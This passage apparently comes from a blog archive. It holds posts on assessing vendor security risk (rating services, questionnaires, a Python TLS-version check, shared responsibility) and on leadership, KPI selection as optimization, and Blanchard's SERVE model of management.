Then, are they acting as mobsters? Are they telling you “we know about all these vulnerabilities, if you don’t pay us we will tell your customers”? Not exactly. They are telling everyone willing to pay for access to their data these things, but they are not telling you about it unless you pay them. This is not exactly in line with accepted standards of “responsible disclosure”. At the same time, their findings are often quite basic and anyone bothering to look could find the same things (such as support for old ciphers on TLS or web servers leaking use of an old PHP version). Bottom line, I think their business model is acceptable and that the service can provide efficiency gains for a risk assessment process. I agree with Miessler that trusting this to be a linear scale of cyber goodness is naive at best, but I do think companies with a very poor security rating would be more risky to use than those with good ratings.

Some security vendors have a business model that resembles the extortion rackets of a 1930s mobster. But even mobsters can be useful at times.

Verdict – usefulness: rating services can provide a welcome substitute or addition for slower ways of assessing security posture. An added benefit is the ability to see how things develop over time. Small changes are likely to be of little significance, but a steady improvement of security rating over time is a good sign. These services can be quite costly, so it is worth thinking about how much money you want to throw at it. 

Verdict – are they mobsters? They are not mobsters but they are also not your best friends. 

Are security questionnaires just security theater? 

According to Miessler, you should slim down your security questionnaires to two questions: 

  1. “When was the last time you were breached (what happened, why, and how did you adjust)?”
  2. “Do you have security leadership and a security program?”

The purpose of these questions is to judge if they have a reasonable approach to security. It is easy for people to lie on detailed but generic security forms, and they provide little value. To discover if a company is a metaphorical “axe murderer” the two questions above are enough, argues Miessler. He may have a point. Take for example a typical security questionnaire favorite: “does your company use firewalls to safeguard computers from online attacks?” Everyone will answer “yes”. Does that change our knowledge about their likelihood of being hacked? Not one bit. 

Of course, lying on a short questionnaire with Miessler’s 2 questions is no more difficult than lying on a long and detailed questionnaire. Most companies would not admit anything on a questionnaire like this that is not already publicly known. It is like flying to the US a few years ago, where they made you fill out an immigration questionnaire with questions like “are you a terrorist?” and “have you been a guard at a Nazi concentration camp during WWII?”. It is thus a fair question whether we can just scrap the whole questionnaire. If the vendor you are considering is a software firm, at least if it is a “Software as a Service” or another type of cloud service provider, they are likely to have some generic information about security on their web page. Looking that up will usually be just as informative as any answer to the questions above.

Verdict: Security questionnaires are mostly useless – here I agree with Miessler. I think you can even drop the minimalist axe murderer detection variant, as people who lie on long forms probably lie on short forms too. Perhaps a good middle ground is to first check the website of the vendor for a reasonable security program description, and if you don’t see anything, then you can ask the two questions above as a substitute. 

Stay away from extremely bad practice

Staying away from companies with extremely bad practice is a good idea. Sometimes this is hard to do because business needs a certain service, and all potential providers are horrible at security. But if you have a choice between someone with obviously terrible security habits and someone with a less worrying security posture, this is clearly good advice. Good ways to check for red flags include: 

  • Create a user account and check password policies, reset, etc. Many companies allow you to create free trial accounts, which is good for evaluating security practices as well. 
  • Check if the applications are using outdated practices, poor configuration etc. 
  • Run sslscan to check if they are vulnerable to very old crypto vulnerabilities. This is a good indicator that patching isn’t exactly a priority.
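
As a complement to sslscan, a quick check of which TLS version a server negotiates can be sketched with Python’s standard `ssl` module. This is not a replacement for sslscan: a default Python context negotiates the best version both sides support, so it does not enumerate everything the server would accept. The set of versions treated as outdated below is an assumption for this sketch.

```python
import socket
import ssl
from typing import Optional

# Assumption for this sketch: protocol versions we treat as a red flag.
OUTDATED_VERSIONS = {"SSLv2", "SSLv3", "TLSv1", "TLSv1.1"}


def is_outdated(version: Optional[str]) -> bool:
    """Return True if the negotiated protocol version is on the outdated list."""
    return version in OUTDATED_VERSIONS


def negotiated_tls_version(host: str, port: int = 443, timeout: float = 5.0) -> Optional[str]:
    """Connect to host:port and return the negotiated protocol, e.g. 'TLSv1.3'."""
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            return tls.version()
```

You would call `negotiated_tls_version("vendor.example")` with the vendor’s real hostname (the name here is a placeholder) and pass the result to `is_outdated`. A handshake failure is informative too: it may mean the server only offers protocol versions that a modern client refuses to use.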

Verdict: obviously a good idea.

Assume the vendor is breached and create a risk assessment

This turns the focus to your own assets and risk exposure. Assuming the vendor is breached is obviously a realistic start. Focusing on how that affects the business and what you can do about it makes the vendor risk assessment about business risk, instead of technical details that feel irrelevant.

Miessler recommends: 

  • Understand how the external service integrates into the business
  • Figure out what can go wrong
  • Decide what you can do to mitigate that risk

This is actionable and practical. The first part here is very important, and to a large degree determines how much effort it is worth putting into the vendor assessment. If the vendor will be used for a very limited purpose that does not involve critical data or systems, a breach would probably not have any severe consequences. That seems acceptable without doing much about it. 

On the other hand, what if the vendor is a customer relationship management provider (CRM), that will integrate with your company’s e-commerce solution, payment portal, online banking and accounting systems? A breach of that system could obviously have severe consequences for the company in terms of cost, reputation and legal liabilities. In such a case, modeling what could happen, how one can reduce the risk and assessing whether the residual risk is acceptable would be the next steps.
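
The three steps Miessler recommends (understand the integration, figure out what can go wrong, decide on mitigations) map naturally onto a simple risk register. The sketch below is one hypothetical way to record them; the field names and the example entries are assumptions for illustration, not a prescribed method.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class VendorRisk:
    integration: str              # how the vendor's service connects to the business
    what_can_go_wrong: str        # scenario, assuming the vendor is breached
    mitigation: str               # what we do to reduce the risk
    residual_risk_accepted: bool  # has the business accepted what remains?


def needs_attention(risks: List[VendorRisk]) -> List[VendorRisk]:
    """Return the scenarios where the residual risk has not been accepted."""
    return [risk for risk in risks if not risk.residual_risk_accepted]


# Hypothetical entries for a CRM vendor, for illustration only.
crm_risks = [
    VendorRisk(
        integration="CRM reads order data from the e-commerce solution",
        what_can_go_wrong="Attacker exports customer and order data",
        mitigation="Limit the API token to read-only access on required fields",
        residual_risk_accepted=True,
    ),
    VendorRisk(
        integration="CRM can trigger refunds in the payment portal",
        what_can_go_wrong="Attacker issues fraudulent refunds",
        mitigation="Not decided yet",
        residual_risk_accepted=False,
    ),
]

for risk in needs_attention(crm_risks):
    print(f"Unresolved: {risk.what_can_go_wrong}")
```

Keeping the register this simple makes the risks visible to the business, which is the point of the exercise.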

Shared responsibility – not only in the cloud

Cloud providers talk a lot about the shared responsibility model (AWS version). The responsibility for security of software and data in the cloud is shared between the cloud provider and the cloud customer. They have documentation on what they will take care of, as well as what you as a customer need to secure yourself. For the work that is your responsibility, the cloud provider will typically give you lots of advice on good practices. This is a reasonable model for managing security across organizational interfaces – and one we should adopt with other business relationships too. 

The most mature software vendors already work like this: they have descriptions of their own security practices that you can read. They also have advice on how you should set up integrations to stay secure. The less mature ones will lack both the transparency and the guidance.

This does not necessarily mean you should stay away from them (unless they are very bad or using them would increase the risk in unacceptable ways). It means you should work with them to find good risk mitigations across organizational interfaces. Some of the work has to be done by them, some by you. Bringing the shared responsibility for security into contracts across your entire value chain will help grow security maturity in the market as a whole, and benefit everyone. 

Questionnaires are mostly useless – but transparency and shared responsibility are not.

In Miessler’s vendor security 2.0 post there is a question about what vendor security 3.0 will look like. I think that is when we have transparency and shared responsibility established across our entire value chain. Reaching this cybersecurity Nirvana of resilience will be a long journey – but every journey starts with a first step. That first step is to turn the focus on how you integrate with vendors and how you manage the risk of this integration – and that is a step we can take today. 

How conversations help us grow

We don’t develop alone. As a colleague, and as a leader, there are many ways you can contribute to the growth of others. I would like to share some thoughts on how to create an environment where professionals can thrive, together.

Imagine for a moment that you are having a one-to-one conversation with one of your team members. You ask the person: “Can you describe a situation where you feel you performed really well at work?” Perhaps there is no answer, so you will need to follow up with a few nudges. For example, you say that you perform best when you have a clear goal, and you know why you have this goal. Then you may ask – do you feel the same? They are probably going to agree that this sounds quite good. This could be a conversation starter about what the ideal state of work is – when do we get to be the best versions of ourselves at work?

Conversations are important to people
Humans interact through language. Good conversations at work are essential for fostering growth.

Here’s a list of some plausible factors that people could come up with:

  • We have a clear vision of what we are trying to achieve, together
  • There is room for my opinions to be heard and valued
  • I can use my competence and personal strengths to drive results that are valued by others
  • The work itself is interesting and challenges me to learn
  • We have the necessary time and resources to build fundamental knowledge and skills
  • I get clear feedback and support from my manager
  • We all make an effort to contribute to the success of others
  • Our team enjoys good work-life balance
  • We have realistic career development opportunities (vertical and horizontal)
  • Ambition is welcome

Your list may look different, but variations around purpose, autonomy and community are typically ingredients of most people’s ideal working environment. Caring about what that means for each individual, is the essence of professional empathy. If your job as a leader is to facilitate results through others, how can you do that?  

Humans are good at spotting flaws. Engineers and analysts are perhaps the most skilled of all at this. This is why it is so easy for us to start with a problem when we want to achieve improvement. I think it is better to start by focusing on personal strengths. If you perform work every day where you feel you are not developing, or that your competence is not needed for the type of work being done, it is no wonder if you feel disengaged after a while. The best way to find out if someone’s strengths match the work they do is to ask them. Have a conversation about strengths, and how to best use those strengths in the work we do, as a starting point. That sets a much more positive tone and helps build a sense of having value in the work community, as opposed to the more typical approach of focusing on a gap assessment against a skills matrix.

Professional development is key to the motivation of any professional. Without it, engagement dies. If the organization has no training budget and going to conferences is riddled with bureaucracy and layers upon layers of approval requests, this is likely to hurt employee retention more than factors such as low compensation or a high workload. Training is valuable to each individual, but of course it brings benefits to the organization too. We all know this. Don’t accept a situation where people cannot get training. It is not fair to the employee, and it is not sustainable for the company.

Learning is not only done in trainings. We should aim to learn every day, as individuals, and as organizations. A lot of people have never thought about all the opportunities to learn that exist as part of the work they do every day. As a manager you can improve the effect of learning from doing the work by making it more explicit. For example, during investigation of a particular security incident, analysts learn about new TTP’s, as well as how to detect and stop them. Or, when creating a new policy, discussing with stakeholders and collecting feedback is a great opportunity to learn about the perspectives of different stakeholders. Common to both cases is that this learning is very often wasted. It remains in short-term memory only and can often only be retrieved again by relearning it the next time a need for this knowledge exists. This is why we need to be explicit about expectations to learn on the job.

Everyone should have some time every week to reflect on what has been learned, and what it means for them in the future, as well as for the team and organization as a whole. If we set aside a fixed number of hours for “skills development”, it is good management to encourage employees to spend some of that time reflecting on what they have learned on the job over the last week. Don’t mandate how people reflect or document what they have learned, but do share ideas on how to do it. Some like to write a work journal. Some prefer blogging, some would rather create proof of concept code. Most people have never thought about doing this, or what they prefer, so encourage experimentation.

Some things that people learn on the job are mostly improving individual competencies. But some things are worth sharing, and it is good to challenge existing practices when they are suboptimal. This is how we move forward. Those practices can be policies and guidelines, they can be habits, or they can be ways of using technology. Encourage sharing where sharing is due. Encourage challenging the status quo and improving the way things are done. Continuous improvement is not a result of a management standard or policy, it is the result of culture. We need to make it happen. As a leader you should visibly share knowledge, visibly challenge practices, and encourage others to do so too. When people see that you are doing it, and not only talking about it, the message becomes much more powerful. A good place to start inviting such contributions is to take a page from lean management and ask: “what is something we spend time on today that we could stop doing without any harm to the organization or our department?”

Of course, our hypothetical bullet point list of a great working environment that will help us perform at our best is not only about learning and training. Another important aspect here is relationships at work. This is what we can think of as “work community”. A leader is a catalyst for work community; not necessarily the driver of it, but the leader helps the organization choose healthy pathways to build community. From our bullet points, the desire to have room for opinions to be heard and valued packs a lot into one sentence. What has to be in place for us to have such a situation? We definitely need a certain level of psychological safety, so that people don’t fear ridicule or being ignored when they raise their voice. We can achieve a sense of psychological safety when we can trust that our surroundings have our best interest in mind. The people we surround ourselves with want us to succeed. At the same time, we must accept disagreement and honesty. We should not expect any idea to be accepted at face value; we should expect, even demand, that every idea is challenged. But it should be challenged constructively, respectfully, and without any implication of us thinking less of the person bringing the idea to the table. Bringing a bad idea to the table is infinitely better than not bringing any ideas to the table. A culture of silence is the place where creativity goes to die. So, what can you do to foster this ideal state where people love to contribute and really feel that their contributions mean something to the department, and to the organization?

One thing you can do to instill trust, is to be vulnerable. Put yourself at risk by sharing your ideas with your team and ask them for feedback. Not the type of feedback often given to managers, such as “OK” or “looks good to me”. Ask for concrete feedback on “what do you like about this suggestion?”, “what do you dislike about it?”, “why do you think so?”, “how can we improve it?”. Let people see that you don’t have all the answers. If the case you are trying to improve is difficult, let people know you think it is difficult. Taking away the notion that you have to know everything is helpful for reducing imposter syndrome.

Empathy is key to trust. We cannot expect to have the same kind of relationship with everyone on the team, or to reduce relationship management to a bullet point list, but we can seek to have valuable and trusting relationships with everyone on the team. To build healthy relationships that foster trust, investing time in working together and in having conversations about both work and life itself is time well spent. Listen actively in conversations, and care about the ambitions and wants of the other person, as well as the organization. Active listening is a skill worth practicing every day.

Another thing you can do is to think about how you balance relationships versus results.

What have you done lately to support the personal ambitions and career plans of your team members? For example, if one of your team members has a personal dream of publishing a novel, how would you think about that in terms of your manager-employee relationship? Is it irrelevant to work, should you discourage such ambitious personal plans for fear of their thoughts being spent on non-work-related projects, or should you support it and help them balance those ambitions with responsibilities and ambitions at work? I know what I think is the best choice, but your view may be different. It is worth thinking about.

And that brings me to the end of this post, thinking. Leadership is difficult. People are complex, and there are so many things that influence how we behave and think. This is why leaders also need support structures. You will have doubts, and you will have seemingly intractable judgments to make. Having a mentor is helpful, someone who can empathize with you as a leader, someone who knows to ask good questions and help you reason. Supporting each other in the leadership team is essential; share your management practices, your doubts, and how that difficult conversation went (while respecting the privacy of your team members, as appropriate). If you want to develop as a leader, I highly recommend finding a good mentor. Good mentors elevate your thinking.

A letter to the manager

This is a letter to all managers out there. If you are being paid to manage other people, this one is for you.

Leadership is like baking. It has a lot of ingredients and care means more than measurements.

I bet there is friction in your team. There is friction in all teams, and some of it is healthy. But when it turns into a chronic condition, relentless, abrasive, never taking a break – then you have a problem. And it may very well be that you and your organization are at fault for creating this unhealthy and unproductive environment. For many workers, work no longer feels inspiring and rewarding. Instead, colleagues feel tired, and many feel disengaged at work. This is a big problem. Disengagement is the arch enemy of excellence. And we would all like to be considered centers of excellence, wouldn’t we?

Perhaps there is a narrow focus on performance management through reporting and key performance indicators. This approach resonates well with most engineers and accountants; what is measured gets managed. There is no doubt that we need to measure performance. How else would we know if we are moving in the right direction? And perhaps that is the core of the disengagement problem. Because who knows what future state we are trying to move towards? If there is a lack of a shared and compelling vision, it is hard for people to know what matters, and what is just noise.

Performance management is a double-edged sword. It has downsides that managers need to be aware of and watch closely, to keep the negative effects from overtaking the good ones. A very strong focus on key performance indicators tends to bring out side effects such as a lack of involvement and tunnel vision, and it can also exacerbate short-termism. All of this together tends to create disengagement, which in turn drives the real key performance indicators in the wrong direction. Successful managers know how to balance focus on results and relationships. Managing based on measurements alone will tip the balance of focus heavily towards results over relationships, but without healthy relationships we cannot reliably drive results over time.

Let us first consider how measurements can help us drive results in a complex system such as a big organization, and then return to how we tie achievement to key management practices.

About measurements

Measurements are critical. But how do we know if what we measure, and the results we infer from our KPI’s, indicate progress? Managing an organization is an optimization problem. To know whether we succeed or not, we need to know what we are aiming for. In mathematical optimization this is called the objective function – a mathematical function that we seek to minimize, typically under a set of constraints. In management, we typically rely on a vision statement to guide our actions. The KPI’s we live and manage by, should have a clear connection to that vision. Without this connection, it is hard to tell whether a change in the KPI is good or bad, or if such a change is important, or merely a weak improvement of the whole system. To make these connections, we need to apply systems thinking. Systems thinking means an approach where we look at the internal and external interactions of a system and try to understand how our actions push this system from one state to another. Is that new state taking us closer to our desired state, as described in our vision?

Let us go back to our mathematical optimization problem as an analogy of what we are trying to do. Let’s say we have a mathematical model describing “the system”. This model describes the interactions internally in the system, as well as how the system responds to external events that we have no control over, and to actions we take on purpose to drive our system towards that optimal state, where an objective function is minimized. This is a very difficult problem: how can we make the best decisions about the inputs we can control (let’s call them u) to optimize the state of a system when there is considerable uncertainty from signals that we cannot control (let’s call them d)?

In most cases we are also not able to observe every state of the system. There are features of our complex system we cannot see. In some cases, we may infer what they are, but very often we have limited observability of the internal state. This is also true of organizations and management; there will always be internal factors we have no way of observing.

When we make decisions about what to do next, we need to rely on things we can see. These are measurement variables, y. This information can be used to drive our system towards our ideal state, but not all information is equally important. Sometimes two different measurements can also give us in essence the same information. Mathematically speaking we say that the measurements are highly correlated. This means that for solving our mathematical optimization problem, it is not arbitrary which measurement variables we use to drive our decisions. We should carefully select measurements that give us the best ability to approach our optimal state, that is, to minimize our objective function. This is the same for management of an organization; we should pick the KPI’s that will help us the most in moving in the direction of our vision.
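
The problem described so far can be written compactly. The symbols u, d and y are the ones introduced in the text; J (the objective function), x (the internal state we cannot fully observe), f (the system model), g (the constraints) and h (the relation between state and measurements) are notation assumed here for illustration.

```latex
\begin{aligned}
\min_{u} \quad & J(x, u, d) \\
\text{subject to} \quad & f(x, u, d) = 0, \\
& g(x, u, d) \le 0, \\
& y = h(x, u, d)
\end{aligned}
```

In the management analogy, J measures the distance to the vision, u are the actions we choose, d are the external events we cannot control, and y are the KPI’s we are able to observe.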

The actions we take can be viewed as inputs to our system, whether they are variables in a mathematical optimization problem, or actions and tasks to focus on in an organization. Say we have decided on some key performance indicators we would like to drive to some target values. We need to choose our actions for doing this. We will typically have many candidates for actions to take, but not all of them are equally effective. We have two decision problems to solve: which knob should I turn, and what value should I set it to? We also have another issue to keep in mind. While turning a certain knob may drive a property of our system in the desired direction as measured by one specific KPI, what if it makes the situation worse as measured by another KPI? Our optimization problem is much more difficult to solve if there is significant interaction between the internal states we change through our inputs. We should thus aim to decouple the input-output structure of our system. We would like to use inputs (actions) that do not cause conflicting outcomes as measured by different outputs (i.e., our KPI’s). This is not always possible, but we should be aware of the possibility of conflicting interactions and strive for more decoupling in the measurements we use.

So, if we now can agree that it is important to carefully select KPI’s, do we have any heuristics or rules that can help us do that? Luckily, we do. This has been extensively studied both from a mathematical point of view, and from a management theory point of view. It is a good thing that the general conclusions from different research areas do align well with each other.

  • Select KPI’s that are tightly coupled to the objective function so that a change in the KPI would indicate a change in the closeness to our ideal state
  • Select KPI’s that have optimums that are close to invariant under noise and disturbances. This means that if we have small errors in the measurement of our KPI, or external conditions change slightly, we are still operating close to the ideal point of operation.
  • Select KPI’s that are not strongly correlated with each other as they would not together provide more information about the internal state of the system than one alone would
  • Do not select more KPI’s than you have inputs to manipulate. This is because we cannot independently change more outputs than we have inputs available.
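The heuristics above can be sketched as a small greedy selection. This is only an illustration under simplifying assumptions: plain Pearson correlation stands in for “tightly coupled to the objective”, the 0.9 overlap threshold is arbitrary, and the KPI names and numbers are invented for the example.

```python
from math import sqrt


def pearson(xs, ys):
    """Pearson correlation of two equally long samples (neither may be constant)."""
    n = len(xs)
    mean_x, mean_y = sum(xs) / n, sum(ys) / n
    cov = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    var_x = sum((x - mean_x) ** 2 for x in xs)
    var_y = sum((y - mean_y) ** 2 for y in ys)
    return cov / sqrt(var_x * var_y)


def select_kpis(candidates, objective, n_inputs, max_overlap=0.9):
    """Greedy pick: strongest link to the objective first, skip near-duplicates."""
    ranked = sorted(
        candidates,
        key=lambda name: abs(pearson(candidates[name], objective)),
        reverse=True,
    )
    chosen = []
    for name in ranked:
        if len(chosen) == n_inputs:
            break  # never more KPIs than inputs we can manipulate
        overlaps = any(
            abs(pearson(candidates[name], candidates[other])) > max_overlap
            for other in chosen
        )
        if not overlaps:
            chosen.append(name)
    return chosen


# Hypothetical monthly observations, invented for illustration only
objective = [1.0, 2.0, 3.0, 4.0, 5.0]
candidates = {
    "uptime": [1.1, 2.0, 2.9, 4.2, 5.0],
    "availability": [1.0, 2.1, 3.0, 4.1, 5.1],  # nearly the same signal as uptime
    "tickets_closed": [2.0, 1.0, 4.0, 3.0, 5.0],
    "meetings_held": [3.0, 3.1, 2.9, 3.0, 3.1],
}
selected = select_kpis(candidates, objective, n_inputs=2)
```

With two inputs available, the sketch keeps only one of the two nearly identical availability measures and fills the second slot with a KPI that carries different information.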

If we pull this knowledge into the context of managing an organization, we can make some immediate observations. First, it will be very hard to select good KPI’s unless we know where we are heading. We need a clear vision for the organization. This is our objective function. Let us try to define a few possible “visions” to see how they would affect our KPI selection problem.

  1. Our vision is to make the CTO happy with the technology department
  2. Our vision is to enable the organization to provide services our customers love
  3. Our vision is to replace all humans in the company with robots maintained by others

These examples are of course contrived but they are made to illustrate that what we want to achieve will heavily influence what we measure, and how we work towards that ideal state. Let us take the first suggestion – our vision is to make the CTO happy with the technology department. Perhaps the deeper motivation for such a vision could be to secure bonuses for ourselves and our friends, or because we are uncertain about management’s ability to see value in what we do so we would like to keep the CTO happy for the sake of our own job security. Of course, none of these are admirable motives but let us pretend this is the case for a moment and see how we would seek to optimize that problem.

The CTO is happy when:

  • We do not ask questions but execute desires from top management quickly
  • We report numbers that make the CTO look good to other executives
  • We buy products and services from vendors the CTO has a tight relationship with

Our KPI’s should then be on speed of implementation, and on reporting progress through measurements that are easy to move a lot but do not necessarily create competitive advantage for the company. Perhaps a KPI should also be the number of LinkedIn contacts of the CTO associated with each vendor we choose. Obviously – this would be absurd. We are optimizing for the wrong objective function! We see that this type of opportunism is not only suboptimal, it is bordering on corruption.

If, on the other hand, we want to maximize our customer’s love of the services delivered by our organization, we would likely select other KPI’s. When would customers like our products more than those from our competitors?

  • Our products do not have a lot of vulnerabilities and can be trusted
  • Our products are reliable and exceed the expectations the customers have
  • Our risk mitigations are designed to stop harm to our customers
  • Our marketing messages make our customers feel good about our offerings
  • Our products and services are easy to use

Say that this is what we believe underpins making the vision of “most loved supplier” reality. What should we measure to help drive results? We need to make sure our products are trustworthy and reliable – so using quality and security metrics will make sense. We need to make sure our products exceed expectations; meaning we need to watch closely the feedback from customers and the market. We need to make our products very easy to use – measuring user behavior to see if actual use of our products matches what we intended would be an important part of making up the full picture.

A lot of this cannot be achieved internally by one department or division alone. We need to sell this approach to the entire organization, from top management to marketing and sales, to engineering. Our sphere of influence needs to expand to make our vision reality. Selling does not necessarily come naturally to our team members, so focusing on driving activity before driving results can be a reasonable approach. One way to do this is to look at time spent on working with other units to make sure we do not fall into the internal focus trap. So where the manager obsessed with output-based KPI’s would see internal socialization as wasted time, the more relationship-aware manager understands that this underpins the creation of business value.

Further, as we expect our team members to “sell our vision” to the organization, people will need support, not just performance push. We will get back to that.

The point of this is, we should not try to measure all the things possible, we need to prioritize, and track KPI’s that align closely with our vision for the future. And to do that, we must first define that vision clearly. It must be shared by everyone, understood, and felt to be “right”. To be effective it must align with our values, and it must align with the values of the organization. In that set of values, we find innovation and agility. A practice that causes dissonance between the values we identify with, and our daily work, leads to frustration. And that has unfortunately become very common, and perhaps it has gotten even worse after COVID due to less strategic focus and involvement?

Creating excellence through people

Leadership is about creating results through others. We cannot do that through one-sided focus on “productivity”. It does not matter if you do a lot of things, if those are not the right things to be done, or if the things we do are not done very well. A top-down management approach will often lead us into doing things without putting our hearts in it, and without considering if they are the right things to do, as long as the measured numbers and reports are produced. That is an illusion of effectiveness.

An approach to leadership that seeks to balance organizational performance and human development is “situational leadership”. This term stems from work done in the 1970’s by academics, and has developed significantly since, but the main take-aways are:

  • Not every situation is most effectively managed with the same style of leadership
  • For long-term organizational performance we need to balance our focus on tasks and relationships

According to this leadership theory, a good leader develops “the competence and commitment of their people so they’re self-motivated rather than dependent on others for direction and guidance”.

It should be clear that an over-focus on task performance will run counter to this principle and can easily lead to micromanagement. Micromanagement is warranted when competence is very low but enthusiasm to learn is high, but in knowledge organizations primarily employing university graduates this is rarely the situation at hand. Micromanagement in knowledge organizations is counterproductive.

So what should a good leader do?

Ken Blanchard is one of the originators of situational leadership theory, and he has written many books in a semi-fictional style. His most well-known book from the 1980’s is a quick read called “The One-Minute Manager”. It is still a good read about management, for learning about motivation and driving human excellence. In this book he introduces the concept of the serving leader, with the acronym SERVE serving as a reminder of key management practices. The practices are summarized as follows:

  • See the future
  • Engage and develop others
  • Reinvent continuously
  • Value results and relationships
  • Embody the values of the organization

See the future: develop a compelling shared vision of the future

This is the precursor to strategy. How can we plan what actions to take if the direction is unclear? How can we expect people to pull in the same direction, if they have no shared model of what an ideal future looks like? Therefore, creating a vision needs to be a collaborative experience. It is also necessary that the responsibility for articulating a vision for a business unit, lies clearly with the top leader of that unit.

A good vision, whether for a team or an organization should consider the core values of the organization. The values say something about what the organization sees as important, valuable, worth striving for. All organizations have values, whether articulated or not. If they are not articulated, or they are simply “dormant” – somebody defined them, but they are not widely known or reflected upon, they provide no guidance. Start with the values.

An effective vision sets a clear direction. It describes a future ideal state, somewhere we want to go. That state must be compelling to the team, and something everyone agrees that we would like to achieve.

Having a compelling and shared vision makes everything easier. Prioritizing what is important becomes easier. Motivating both oneself and others is much easier. Seeing if the fruit of our work moves us closer to where we want to be, becomes easier. It is a common saying that visibility is important.

Engage and develop others

To accomplish something great together we need to learn, as an organization, and as individuals. Leaders must support development of people, and of good practice. How do we develop people, so that they feel that work is rewarding, and improve their competence in a way that supports the organization in reaching its goals as well? The first thing we need to do is to acknowledge that development and optimization requires time, trust, acknowledgement, support, and effort.

Excellence does not come from task performance alone, although much can be learned “on the job” as well. A good approach to competence management requires the ability to think about systems. An individual alone is complex, a system. A team adds more complexity, not to speak of a large organization, or our entire market. Even society as a whole is relevant to our development. We need to consider systemic effects if we are going to effectively engage and develop others. That means that we must consider if our result focus is interfering with our ability to drive positive development. We need to align our performance management efforts with our competence goals.

Human performance requires motivation. A large part of “engage and develop others” is thus related to motivational leadership. Research in competence management has taught us about many factors that contribute to the motivation of people at work. Key influencing factors are:

  • Task motivation: a desire to solve the problem at hand, intrinsic motivation for the work itself. This is a state we should strive for.
  • Confidence in own competence: the individual’s self-esteem as it relates to competence and knowledge at work and in a group
  • Perceived autonomy: ability and acceptance of independent influence and decision making
  • Perceived use of own competence: that the work to be done requires the skills and abilities of each person to be actively used
  • Clear expectations: a clear understanding of what is expected of output, behaviors and social interaction from colleagues, leaders, and other relationships
  • Time and resources for competence development and training
  • A culture of excellence: where everyone expects the best of everyone, and provides support to achieve that
  • Usefulness of the work – a desire to help the wider organization achieve its goals (again pointing back to the vision)

Leaders play a crucial role in optimizing the environment around the factors above. This can be done through organizational design (who do we hire), how we work together, how we select and work on tasks, how we coach and support one another, how we share our own knowledge, and how we provide feedback to each other.

This is very hard to do unless we trust each other and know each other more personally than what particular job skills we have or what we can read from a CV. The only way to foster that trust is to care deeply about other people, to care about their success in terms of what is important to them, as well as to care about their value and contributions to the social group at work as a whole.

“Culture eats strategy for breakfast” is an old saying, and it holds a lot of truth.

Reinvent continuously

We will not achieve our vision in a vacuum. We are exposed to both internal and external competitive pressures. Competition for resources, for relevance, and market forces that decide whether our desired future state is still the right goalpost to aim for. To be successful in moving into our ideal future, even when clouded by uncertainty, we must innovate. Without innovation, the competitive pressures will crush us (external threat) and our internal performance will dwindle due to destruction of motivation and achievability of our goal. Hence, innovation must be on every leader’s agenda.

To reinvent you need to learn. Therefore, every leader should make it a practice to learn new things. Not only about the topic of the work, such as information security for example, or about leadership itself. Leaders should learn about the things that matter to society, to the supply chain, to the organization, and to individuals. A lot of this learning can come from fiction, from cultural experiences and from hobbies. It is through the way we interact with the world we learn to understand the world. That means that to drive effective innovation, we should not be workaholics. System thinking requires system understanding, and that understanding cannot come entirely from an inside perspective.

Innovation means change. We do something new, and we take risks. Innovation means doing things we don’t know will work. If we want others to innovate, to drive practice forward, we need leaders who are brave. Failure must be expected, perhaps even celebrated if we learn from it. Failure is always seen as risky by people in an organization due to perceived expectations of being successful, efficient, productive. It is important for leaders to show willingness to take risks, try new things, and fail in a transparent way that others can see when things do not go the way we want.

There are many ways to reinvent or innovate. It can happen at the individual level, as a group in a natural, non-directed way, or as a managed project. It is also important to make innovations visible, no matter what type of innovation we are talking about.

Reinvention can be about processes. It can also be about technologies, products. We should always work to improve our processes and ways of working. This means that people must be able to voice their opinions, as well as to experiment. If we talk about trying new ways of doing things, challenging each other’s thinking along the way, we improve the odds of success. To make this reality, it is important that we create a culture where people will speak their minds, and where those who make decisions think about the suggestions and concerns raised. Involvement only works when it is authentic. Experimentation takes time. If someone wants to try something new, discuss and agree on how much “extra time” is OK to spend on experimentation to drive things forward. Maximize time spent on driving creativity, efforts to create and test, and make evaluation easy. Innovation work is where agile shines, working software above extensive documentation. Or demonstration by “doing” above extensive KPI’s.

Value relationships and results

Results matter. But it is through our relationships we create our best results. Relationships drive improvement, innovation, motivation, and quality.

As a leader, take time to build strong relationships with others. Not only with your own leaders, or with your direct reports. Those are important, but so are other people. Those who use the work produced by your unit. Those who need to support your unit in creating results. For example, for an information security team, it is often necessary to get help from the IT helpdesk in handling security incidents. If you as a leader have a strong relationship with the leader of the helpdesk team, and some of the key helpdesk members, their willingness to help and make a real effort when the security team needs help will be much higher. The same goes for the relationships between your team members, and people who work in adjacent teams that we interact with. Value your people’s efforts to build relationships within the unit, in the organization, and even externally, even if their day-to-day work is not about external contact with vendors or customers. Every employee is a brand ambassador, and a strong brand drives results across the whole organization, even in business support functions.

As a leader, you should try to encourage and support people’s efforts in building relationships. One can provide arenas such as cross-functional knowledge sharing, or break activities. One can think strategically about how we engage with other units through the work we do and choose ways of working that make it easier to build relationships with other people. Those relationships create trust, and trust is the parent of collaboration. This way – relationships help us drive performance. They create results.

Valuing results is also very important. This often comes more naturally to an organization driven by measurements and reporting. Showing acknowledgement of results helps us improve motivation, trigger ideas for improvement, and further create a need for more collaboration. In this way, a focus on results creates a need for relationship management.

  • Celebrate all wins – big and small
  • When things go wrong – appreciate what can be learned. That is a result too.
  • Evaluate results based on outcome, expectation, handling of challenges and effort.
  • We should value the way a result was achieved as much as the result itself.

Embody the values of the organization

Authenticity is key to trust. The actions of an organization’s leaders are very visible to their direct reports, but also to others. A leader who acts in a way that does not harmonize with the organization’s values does not support achieving the vision.

Inauthenticity will drive mistrust. Nobody is willing to go beyond the bare minimum to follow a leader who acts as if he or she does not actually believe in the vision, in the agreed values. This boils down to “walk the way you talk”. If you talk about agility, but opt for micromanagement, this creates dissonance. If you say you want to empower people to innovate but discourage taking risks, little innovation will occur. Authenticity matters. This means not only trying to behave in accordance with the values of the organization superficially, but actively working to bring the system forward just as you expect others to.

Do you want people to innovate? Then you must innovate. Do you want people to share your vision? Then you must invite participation in its creation and how to articulate it. Do you want people to learn and develop? Then you must learn and develop. There is no better way to portray authenticity than letting people see the things you do. Actions reinforce words.

